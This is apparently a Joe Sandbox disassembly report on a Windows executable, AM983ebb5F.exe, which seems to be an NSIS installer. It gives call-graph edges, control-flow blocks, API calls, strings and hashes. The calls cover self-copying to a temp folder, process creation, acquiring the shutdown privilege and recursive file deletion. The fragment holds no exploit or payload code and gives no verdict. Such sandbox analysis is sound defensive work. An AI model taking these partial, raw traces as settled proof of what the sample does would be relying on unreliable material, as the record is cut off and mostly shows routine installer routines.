403a2c CopyFileW 3318->3319 3319->3274 3319->3324 3320 405c63 71 API calls 3320->3324 3321 406317 40 API calls 3321->3324 3322 406594 21 API calls 3322->3324 3323 405b3a 2 API calls 3323->3324 3324->3274 3324->3306 3324->3311 3324->3313 3324->3314 3324->3315 3324->3316 3324->3320 3324->3321 3324->3322 3324->3323 3325 403aa5 CloseHandle 3324->3325 3326 4068b4 2 API calls 3324->3326 3325->3274 3326->3324 3327->3254 3328->3257 3330 406805 5 API calls 3329->3330 3332 40350d 3330->3332 3331 403517 3331->3263 3332->3331 3333 405e26 3 API calls 3332->3333 3334 40351f 3333->3334 3335 405b05 2 API calls 3334->3335 3336 403525 3335->3336 3337 406076 2 API calls 3336->3337 3338 403530 3337->3338 3338->3263 3442 406047 GetFileAttributesW CreateFileW 3339->3442 3341 4030c2 3362 4030d2 3341->3362 3443 406557 lstrcpynW 3341->3443 3343 4030e8 3344 405e72 2 API calls 3343->3344 3345 4030ee 3344->3345 3444 406557 lstrcpynW 3345->3444 3347 4030f9 GetFileSize 3348 4031f3 3347->3348 3352 403110 3347->3352 3445 40301e 3348->3445 3350 4031fc 3353 40322c GlobalAlloc 3350->3353 3350->3362 3480 4034ea SetFilePointer 3350->3480 3352->3348 3354 40325f 3352->3354 3352->3362 3364 40301e 6 API calls 3352->3364 3477 4034d4 3352->3477 3456 4034ea SetFilePointer 3353->3456 3359 40301e 6 API calls 3354->3359 3357 403215 3360 4034d4 ReadFile 3357->3360 3358 403247 3457 4032b9 3358->3457 3359->3362 3363 403220 3360->3363 3362->3271 3363->3353 3363->3362 3364->3352 3366 403290 SetFilePointer 3366->3362 3368 40694b 5 API calls 3367->3368 3369 403c3d 3368->3369 3370 403c43 3369->3370 3371 403c55 3369->3371 3497 40649e wsprintfW 3370->3497 3372 406425 3 API calls 3371->3372 3373 403c85 3372->3373 3374 403ca4 lstrcatW 3373->3374 3377 406425 3 API calls 3373->3377 3376 403c53 3374->3376 3482 403eff 3376->3482 3377->3374 3380 405f2e 18 API calls 3381 403cd6 3380->3381 3382 403d6a 3381->3382 3385 406425 3 API calls 3381->3385 3383 405f2e 18 API calls 3382->3383 3384 403d70 3383->3384 3386 403d80 LoadImageW 
3384->3386 3388 406594 21 API calls 3384->3388 3387 403d08 3385->3387 3389 403e26 3386->3389 3390 403da7 RegisterClassW 3386->3390 3387->3382 3391 403d29 lstrlenW 3387->3391 3394 405e53 CharNextW 3387->3394 3388->3386 3393 40140b 2 API calls 3389->3393 3392 403ddd SystemParametersInfoW CreateWindowExW 3390->3392 3422 403e30 3390->3422 3395 403d37 lstrcmpiW 3391->3395 3396 403d5d 3391->3396 3392->3389 3397 403e2c 3393->3397 3398 403d26 3394->3398 3395->3396 3399 403d47 GetFileAttributesW 3395->3399 3400 405e26 3 API calls 3396->3400 3402 403eff 22 API calls 3397->3402 3397->3422 3398->3391 3401 403d53 3399->3401 3403 403d63 3400->3403 3401->3396 3404 405e72 2 API calls 3401->3404 3405 403e3d 3402->3405 3498 406557 lstrcpynW 3403->3498 3404->3396 3407 403e49 ShowWindow 3405->3407 3408 403ecc 3405->3408 3410 4068db 3 API calls 3407->3410 3490 4056af OleInitialize 3408->3490 3412 403e61 3410->3412 3411 403ed2 3414 403ed6 3411->3414 3415 403eee 3411->3415 3413 403e6f GetClassInfoW 3412->3413 3416 4068db 3 API calls 3412->3416 3418 403e83 GetClassInfoW RegisterClassW 3413->3418 3419 403e99 DialogBoxParamW 3413->3419 3421 40140b 2 API calls 3414->3421 3414->3422 3417 40140b 2 API calls 3415->3417 3416->3413 3417->3422 3418->3419 3420 40140b 2 API calls 3419->3420 3420->3422 3421->3422 3422->3274 3423->3261 3424->3308 3425->3277 3426->3303 3427->3306 3429 403b67 3428->3429 3430 403b59 CloseHandle 3428->3430 3510 403b94 3429->3510 3430->3429 3433 405c63 71 API calls 3434 403a82 OleUninitialize 3433->3434 3434->3283 3434->3284 3436 405bcc 3435->3436 3437 403a9d ExitProcess 3436->3437 3438 405be0 MessageBoxIndirectW 3436->3438 3438->3437 3440 401389 2 API calls 3439->3440 3441 401420 3440->3441 3441->3285 3442->3341 3443->3343 3444->3347 3446 403027 3445->3446 3447 40303f 3445->3447 3448 403030 DestroyWindow 3446->3448 3449 403037 3446->3449 3450 403047 3447->3450 3451 40304f GetTickCount 3447->3451 3448->3449 3449->3350 3454 406987 2 API calls 3450->3454 3452 403080 
3451->3452 3453 40305d CreateDialogParamW ShowWindow 3451->3453 3452->3350 3453->3452 3455 40304d 3454->3455 3455->3350 3456->3358 3459 4032d2 3457->3459 3458 403300 3461 4034d4 ReadFile 3458->3461 3459->3458 3481 4034ea SetFilePointer 3459->3481 3462 40330b 3461->3462 3463 40346d 3462->3463 3464 40331d GetTickCount 3462->3464 3466 403253 3462->3466 3465 4034af 3463->3465 3470 403471 3463->3470 3464->3466 3473 40336c 3464->3473 3468 4034d4 ReadFile 3465->3468 3466->3362 3466->3366 3467 4034d4 ReadFile 3467->3473 3468->3466 3469 4034d4 ReadFile 3469->3470 3470->3466 3470->3469 3471 4060f9 WriteFile 3470->3471 3471->3470 3472 4033c2 GetTickCount 3472->3473 3473->3466 3473->3467 3473->3472 3474 4033e7 MulDiv wsprintfW 3473->3474 3476 4060f9 WriteFile 3473->3476 3475 4055dc 28 API calls 3474->3475 3475->3473 3476->3473 3478 4060ca ReadFile 3477->3478 3479 4034e7 3478->3479 3479->3352 3480->3357 3481->3458 3483 403f13 3482->3483 3499 40649e wsprintfW 3483->3499 3485 403f84 3500 403fb8 3485->3500 3487 403cb4 3487->3380 3488 403f89 3488->3487 3489 406594 21 API calls 3488->3489 3489->3488 3503 404522 3490->3503 3492 4056f9 3493 404522 SendMessageW 3492->3493 3495 40570b CoUninitialize 3493->3495 3494 4056d2 3494->3492 3506 401389 3494->3506 3495->3411 3497->3376 3498->3382 3499->3485 3501 406594 21 API calls 3500->3501 3502 403fc6 SetWindowTextW 3501->3502 3502->3488 3504 40453a 3503->3504 3505 40452b SendMessageW 3503->3505 3504->3494 3505->3504 3508 401390 3506->3508 3507 4013fe 3507->3494 3508->3507 3509 4013cb MulDiv SendMessageW 3508->3509 3509->3508 3511 403ba2 3510->3511 3512 403b6c 3511->3512 3513 403ba7 FreeLibrary GlobalFree 3511->3513 3512->3433 3513->3512 3513->3513 4407 401a35 4408 402dab 21 API calls 4407->4408 4409 401a3e ExpandEnvironmentStringsW 4408->4409 4410 401a52 4409->4410 4412 401a65 4409->4412 4411 401a57 lstrcmpW 4410->4411 4410->4412 4411->4412 4418 4023b7 4419 4023bf 4418->4419 4422 4023c5 4418->4422 4420 402dab 21 API calls 4419->4420 
4420->4422 4421 4023d3 4424 4023e1 4421->4424 4425 402dab 21 API calls 4421->4425 4422->4421 4423 402dab 21 API calls 4422->4423 4423->4421 4426 402dab 21 API calls 4424->4426 4425->4424 4427 4023ea WritePrivateProfileStringW 4426->4427 4428 4014b8 4429 4014be 4428->4429 4430 401389 2 API calls 4429->4430 4431 4014c6 4430->4431 4432 402439 4433 402441 4432->4433 4434 40246c 4432->4434 4435 402deb 21 API calls 4433->4435 4436 402dab 21 API calls 4434->4436 4437 402448 4435->4437 4438 402473 4436->4438 4440 402dab 21 API calls 4437->4440 4441 402480 4437->4441 4443 402e69 4438->4443 4442 402459 RegDeleteValueW RegCloseKey 4440->4442 4442->4441 4444 402e76 4443->4444 4445 402e7d 4443->4445 4444->4441 4445->4444 4447 402eae 4445->4447 4448 4063c4 RegOpenKeyExW 4447->4448 4449 402edc 4448->4449 4450 402eec RegEnumValueW 4449->4450 4455 402f0f 4449->4455 4458 402f86 4449->4458 4451 402f76 RegCloseKey 4450->4451 4450->4455 4451->4458 4452 402f4b RegEnumKeyW 4453 402f54 RegCloseKey 4452->4453 4452->4455 4454 40694b 5 API calls 4453->4454 4456 402f64 4454->4456 4455->4451 4455->4452 4455->4453 4457 402eae 6 API calls 4455->4457 4456->4458 4459 402f68 RegDeleteKeyW 4456->4459 4457->4455 4458->4444 4459->4458 4460 40173a 4461 402dab 21 API calls 4460->4461 4462 401741 SearchPathW 4461->4462 4463 40175c 4462->4463 4464 401d3d 4465 402d89 21 API calls 4464->4465 4466 401d44 4465->4466 4467 402d89 21 API calls 4466->4467 4468 401d50 GetDlgItem 4467->4468 4469 40263d 4468->4469 4469->4469

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 403532-403584 SetErrorMode GetVersionExW 1 403586-4035b6 GetVersionExW 0->1 2 4035be-4035c3 0->2 1->2 3 4035c5 2->3 4 4035cb-40360d 2->4 3->4 5 403620 4->5 6 40360f-403617 call 40694b 4->6 7 403625-403639 call 4068db lstrlenA 5->7 6->5 12 403619 6->12 13 40363b-403657 call 40694b * 3 7->13 12->5 20 403668-4036cc #17 OleInitialize SHGetFileInfoW call 406557 GetCommandLineW call 406557 13->20 21 403659-40365f 13->21 28 4036d5-4036e9 call 405e53 CharNextW 20->28 29 4036ce-4036d0 20->29 21->20 26 403661 21->26 26->20 32 4037e4-4037ea 28->32 29->28 33 4037f0 32->33 34 4036ee-4036f4 32->34 37 403804-40381e GetTempPathW call 403501 33->37 35 4036f6-4036fb 34->35 36 4036fd-403704 34->36 35->35 35->36 39 403706-40370b 36->39 40 40370c-403710 36->40 44 403820-40383e GetWindowsDirectoryW lstrcatW call 403501 37->44 45 403876-403890 DeleteFileW call 403082 37->45 39->40 42 4037d1-4037e0 call 405e53 40->42 43 403716-40371c 40->43 42->32 61 4037e2-4037e3 42->61 47 403736-40376f 43->47 48 40371e-403725 43->48 44->45 64 403840-403870 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403501 44->64 66 403896-40389c 45->66 67 403a7d-403a8d call 403b4f OleUninitialize 45->67 49 403771-403776 47->49 50 40378c-4037c6 47->50 54 403727-40372a 48->54 55 40372c 48->55 49->50 56 403778-403780 49->56 58 4037c8-4037cc 50->58 59 4037ce-4037d0 50->59 54->47 54->55 55->47 62 403782-403785 56->62 63 403787 56->63 58->59 65 4037f2-4037ff call 406557 58->65 59->42 61->32 62->50 62->63 63->50 64->45 64->67 65->37 70 4038a2-4038ad call 405e53 66->70 71 403935-40393c call 403c29 66->71 78 403ab3-403ab9 67->78 79 403a8f-403a9f call 405bb7 ExitProcess 67->79 81 4038fb-403905 70->81 82 4038af-4038e4 70->82 77 403941-403945 71->77 77->67 83 403b37-403b3f 78->83 84 403abb-403ad1 GetCurrentProcess OpenProcessToken 78->84 89 403907-403915 call 405f2e 81->89 90 40394a-403970 call 405b22 lstrlenW call 
406557 81->90 86 4038e6-4038ea 82->86 91 403b41 83->91 92 403b45-403b49 ExitProcess 83->92 87 403ad3-403b01 LookupPrivilegeValueW AdjustTokenPrivileges 84->87 88 403b07-403b15 call 40694b 84->88 94 4038f3-4038f7 86->94 95 4038ec-4038f1 86->95 87->88 104 403b23-403b2e ExitWindowsEx 88->104 105 403b17-403b21 88->105 89->67 106 40391b-403931 call 406557 * 2 89->106 110 403981-403999 90->110 111 403972-40397c call 406557 90->111 91->92 94->86 99 4038f9 94->99 95->94 95->99 99->81 104->83 108 403b30-403b32 call 40140b 104->108 105->104 105->108 106->71 108->83 116 40399e-4039a2 110->116 111->110 118 4039a7-4039d1 wsprintfW call 406594 116->118 122 4039d3-4039d8 call 405aab 118->122 123 4039da call 405b05 118->123 126 4039df-4039e1 122->126 123->126 128 4039e3-4039ed GetFileAttributesW 126->128 129 403a1d-403a3c SetCurrentDirectoryW call 406317 CopyFileW 126->129 130 403a0e-403a19 128->130 131 4039ef-4039f8 DeleteFileW 128->131 137 403a7b 129->137 138 403a3e-403a5f call 406317 call 406594 call 405b3a 129->138 130->116 134 403a1b 130->134 131->130 133 4039fa-403a0c call 405c63 131->133 133->118 133->130 134->67 137->67 146 403a61-403a6b 138->146 147 403aa5-403ab1 CloseHandle 138->147 146->137 148 403a6d-403a75 call 4068b4 146->148 147->137 148->118 148->137
                                                                                    APIs
                                                                                    • SetErrorMode.KERNELBASE ref: 00403555
                                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
                                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
                                                                                    • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
                                                                                    • OleInitialize.OLE32(00000000), ref: 00403670
                                                                                    • SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
                                                                                    • GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
                                                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\AM983ebb5F.exe",00000020,"C:\Users\user\Desktop\AM983ebb5F.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036DD
                                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
                                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403832
                                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040384E
                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
                                                                                    • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\AM983ebb5F.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954
                                                                                      • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                    • wsprintfW.USER32 ref: 004039B1
                                                                                    • GetFileAttributesW.KERNEL32( abelsa",C:\Users\user\AppData\Local\Temp\), ref: 004039E4
                                                                                    • DeleteFileW.KERNEL32( abelsa"), ref: 004039F0
                                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1E
                                                                                      • Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321
                                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\AM983ebb5F.exe, abelsa",00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A34
                                                                                      • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?, abelsa",?), ref: 00405B63
                                                                                      • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?, abelsa",?), ref: 00405B70
                                                                                      • Part of subcall function 004068B4: FindFirstFileW.KERNELBASE(74DF3420,0042FAB8,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                                                                      • Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB
                                                                                    • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
                                                                                    • ExitProcess.KERNEL32 ref: 00403A9F
                                                                                    • CloseHandle.KERNEL32(00000000,00438000,00438000,?, abelsa",00000000), ref: 00403AA6
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
                                                                                    • ExitProcess.KERNEL32 ref: 00403B49
                                                                                      • Part of subcall function 00405B05: CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                    • String ID: abelsa"$"C:\Users\user\Desktop\AM983ebb5F.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\erstatningsgraden$C:\Users\user\AppData\Roaming\erstatningsgraden$C:\Users\user\Desktop$C:\Users\user\Desktop\AM983ebb5F.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                    • API String ID: 1813718867-1857143593
                                                                                    • Opcode ID: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
                                                                                    • Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
                                                                                    • Opcode Fuzzy Hash: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
                                                                                    • Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 151 40571b-405736 152 4058c5-4058cc 151->152 153 40573c-405803 GetDlgItem * 3 call 40450b call 404e64 GetClientRect GetSystemMetrics SendMessageW * 2 151->153 155 4058f6-405903 152->155 156 4058ce-4058f0 GetDlgItem CreateThread CloseHandle 152->156 175 405821-405824 153->175 176 405805-40581f SendMessageW * 2 153->176 158 405921-40592b 155->158 159 405905-40590b 155->159 156->155 160 405981-405985 158->160 161 40592d-405933 158->161 163 405946-40594f call 40453d 159->163 164 40590d-40591c ShowWindow * 2 call 40450b 159->164 160->163 170 405987-40598d 160->170 166 405935-405941 call 4044af 161->166 167 40595b-40596b ShowWindow 161->167 172 405954-405958 163->172 164->158 166->163 173 40597b-40597c call 4044af 167->173 174 40596d-405976 call 4055dc 167->174 170->163 177 40598f-4059a2 SendMessageW 170->177 173->160 174->173 178 405834-40584b call 4044d6 175->178 179 405826-405832 SendMessageW 175->179 176->175 180 405aa4-405aa6 177->180 181 4059a8-4059d3 CreatePopupMenu call 406594 AppendMenuW 177->181 190 405881-4058a2 GetDlgItem SendMessageW 178->190 191 40584d-405861 ShowWindow 178->191 179->178 180->172 188 4059d5-4059e5 GetWindowRect 181->188 189 4059e8-4059fd TrackPopupMenu 181->189 188->189 189->180 192 405a03-405a1a 189->192 190->180 195 4058a8-4058c0 SendMessageW * 2 190->195 193 405870 191->193 194 405863-40586e ShowWindow 191->194 196 405a1f-405a3a SendMessageW 192->196 197 405876-40587c call 40450b 193->197 194->197 195->180 196->196 198 405a3c-405a5f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->190 200 405a61-405a88 SendMessageW 198->200 200->200 201 405a8a-405a9e GlobalUnlock SetClipboardData CloseClipboard 200->201 201->180
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405779
                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405788
                                                                                    • GetClientRect.USER32(?,?), ref: 004057C5
                                                                                    • GetSystemMetrics.USER32(00000002), ref: 004057CC
                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405868
                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405889
                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405797
                                                                                      • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004058DB
                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 004058F0
                                                                                    • ShowWindow.USER32(00000000), ref: 00405914
                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405919
                                                                                    • ShowWindow.USER32(00000008), ref: 00405963
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
                                                                                    • CreatePopupMenu.USER32 ref: 004059A8
                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
                                                                                    • GetWindowRect.USER32(?,?), ref: 004059DC
                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
                                                                                    • OpenClipboard.USER32(00000000), ref: 00405A3D
                                                                                    • EmptyClipboard.USER32 ref: 00405A43
                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405A59
                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
                                                                                    • CloseClipboard.USER32 ref: 00405A9E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                    • String ID: {
                                                                                    • API String ID: 590372296-366298937
                                                                                    • Opcode ID: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
                                                                                    • Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
                                                                                    • Opcode Fuzzy Hash: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
                                                                                    • Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 450 405c63-405c89 call 405f2e 453 405ca2-405ca9 450->453 454 405c8b-405c9d DeleteFileW 450->454 456 405cab-405cad 453->456 457 405cbc-405ccc call 406557 453->457 455 405e1f-405e23 454->455 458 405cb3-405cb6 456->458 459 405dcd-405dd2 456->459 463 405cdb-405cdc call 405e72 457->463 464 405cce-405cd9 lstrcatW 457->464 458->457 458->459 459->455 462 405dd4-405dd7 459->462 465 405de1-405de9 call 4068b4 462->465 466 405dd9-405ddf 462->466 467 405ce1-405ce5 463->467 464->467 465->455 473 405deb-405dff call 405e26 call 405c1b 465->473 466->455 470 405cf1-405cf7 lstrcatW 467->470 471 405ce7-405cef 467->471 474 405cfc-405d18 lstrlenW FindFirstFileW 470->474 471->470 471->474 490 405e01-405e04 473->490 491 405e17-405e1a call 4055dc 473->491 476 405dc2-405dc6 474->476 477 405d1e-405d26 474->477 476->459 481 405dc8 476->481 478 405d46-405d5a call 406557 477->478 479 405d28-405d30 477->479 492 405d71-405d7c call 405c1b 478->492 493 405d5c-405d64 478->493 482 405d32-405d3a 479->482 483 405da5-405db5 FindNextFileW 479->483 481->459 482->478 486 405d3c-405d44 482->486 483->477 489 405dbb-405dbc FindClose 483->489 486->478 486->483 489->476 490->466 494 405e06-405e15 call 4055dc call 406317 490->494 491->455 503 405d9d-405da0 call 4055dc 492->503 504 405d7e-405d81 492->504 493->483 495 405d66-405d6f call 405c63 493->495 494->455 495->483 503->483 507 405d83-405d93 call 4055dc call 406317 504->507 508 405d95-405d9b 504->508 507->483 508->483
                                                                                    APIs
                                                                                    • DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\AM983ebb5F.exe"), ref: 00405C8C
                                                                                    • lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\AM983ebb5F.exe"), ref: 00405CD4
                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\AM983ebb5F.exe"), ref: 00405CF7
                                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\AM983ebb5F.exe"), ref: 00405CFD
